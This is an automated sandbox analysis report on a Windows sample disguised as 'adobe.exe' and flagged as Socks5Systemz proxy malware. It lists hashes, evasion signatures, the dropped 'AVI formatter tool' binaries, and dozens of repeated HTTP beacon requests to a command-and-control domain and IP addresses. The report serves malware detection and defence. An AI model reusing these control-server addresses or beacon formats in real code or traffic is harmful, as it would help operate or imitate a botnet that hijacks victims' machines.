Windows Analysis Report
adobe.exe

Overview

General Information

Sample name: adobe.exe
Analysis ID: 1374165
MD5: e9a2997ee4cfb48cb3988f3048e041e9
SHA1: 303d4cb34333e085c47ec565a25abcfa2376db6e
SHA256: 6b05ea2717ccbe9837f6b5108900f96c169d9e252b595ddfec97b071fb67dcae
Tags: exe, Socks5Systemz

Detection

Petite Virus, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Petite Virus
Yara detected Socks5Systemz
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has nameless sections
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • adobe.exe (PID: 7300 cmdline: C:\Users\user\Desktop\adobe.exe MD5: E9A2997EE4CFB48CB3988F3048E041E9)
    • adobe.tmp (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe" MD5: EAF0354C6EA59246416F73EC28FB11AF)
      • aviformattertool.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -i MD5: 354540FAD1E406C119F19FC2499E892C)
      • aviformattertool.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -s MD5: 354540FAD1E406C119F19FC2499E892C)
  • cleanup
No configs have been found

Yara Overview

Dropped files:
Source | Rule | Description | Author
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security

Memory dumps:
Source | Rule | Description | Author
00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
Process Memory Space: aviformattertool.exe PID: 7388 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security

No Sigma rule has matched
No Snort rule has matched

                AV Detection

Source: adobe.exe | Avira: detected
Source: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14 | Avira URL Cloud: Label: malware
Source: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f | Avira URL Cloud: Label: malware
Source: http://185.196.8.22/nq | Avira URL Cloud: Label: malware
Source: C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045C9A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045CA5C ArcFourCrypt
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045CA74 ArcFourCrypt
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_10001000 ISCryptGetVersion
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_10001130 ArcFourCrypt

                Compliance

Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Unpacked PE file: 2.2.aviformattertool.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Unpacked PE file: 3.2.aviformattertool.exe.400000.0.unpack
Source: adobe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb | source: is-R0SOB.tmp.1.dr
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb | source: adobe.tmp, 00000001.00000002.2904468325.000000000072E000.00000004.00000020.00020000.00000000.sdmp, adobe.tmp, 00000001.00000003.1648820462.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000002.2904768508.0000000002313000.00000002.00000001.01000000.00000006.sdmp, adobe.tmp, 00000001.00000003.1648885833.0000000002348000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00474078 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004520D0 FindFirstFileA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0049676C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00463504 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00463980 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00461F78 FindFirstFileA,FindNextFileA,FindClose
Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 65.109.80.185:2023
Source: Joe Sandbox View | IP Address: 185.196.8.22
Source: Joe Sandbox View | IP Address: 65.109.80.185
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
